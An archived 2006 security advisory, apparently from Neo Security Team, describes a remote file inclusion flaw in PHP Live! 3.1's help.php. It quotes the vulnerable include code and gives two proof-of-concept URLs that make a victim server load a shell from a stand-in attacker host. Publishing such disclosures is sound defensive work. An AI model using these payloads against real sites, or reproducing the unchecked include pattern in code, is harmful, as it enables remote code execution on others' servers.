Vulners
Lucene search
phplive31-rfi.txt
`/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #25 - 08/10/06
--------------------------------------------------------
Program: PHP Live!
Homepage: http://www.phplivesupport.com/
Vulnerable Versions: 3.1 and prior
Risk: High!
Impact: Critical Risk
-==PHP Live! <= 3.1 help.php Remote File Inclusion vulnerability==-
---------------------------------------------------------
- Description
---------------------------------------------------------
PHP Live! enables live help and live customer support communication directly
from your website. With PHP
Live!, you can provide one-on-one chat assistance in real-time, answer
visitor questions and add that extra human touch to
your website.
- Tested
---------------------------------------------------------
localhost & many sites
- Explotation
---------------------------------------------------------
Vulnerable code:
==[ help.php 30 ]=============================
[...]
<?php $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ;
include_once( $css_path."css/default.php" ) ; ?>
[...]
==[ end help.php ]============================
How we can see there's an arbitrary file inclusion, so we can just include a
file from another server, executing the php code
in the victim's server.
Proof of Concept:
http://victim.com/phplive/help.php?css_path=http://www.attacker.com/shell.foo%00
We use a NULL byte at the final of the string because include_once() take a
null byte like the end of a string. In this way,
"css/default.php" doesn't appears at the end of the var.
If you don't wanna use a NULL byte you can do something like:
http://victim.com/phplive/help.php?css_path=http://www.attacker.com/shell.foo?foo=
In this way $foo has css/default.php in the attacker script.
Note: this vulnerability is present only if register_globals is turned on.
There are a lot of Local and Remote File Inclusion vulnerabilities in this
script... but there is no reason to publish it.
- How to fix it? More information?
--------------------------------------------------------
Visit our forum to know how to fix it or to get more information.
http://www.neosecurityteam.net/foro/
- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=25
- Credits
--------------------------------------------------------
Discovered by Paisterist -> paisterist.nst [at] gmail [dot] com
[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/
- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
m0rpheus
nikyt0x
Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
/* EOF *
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4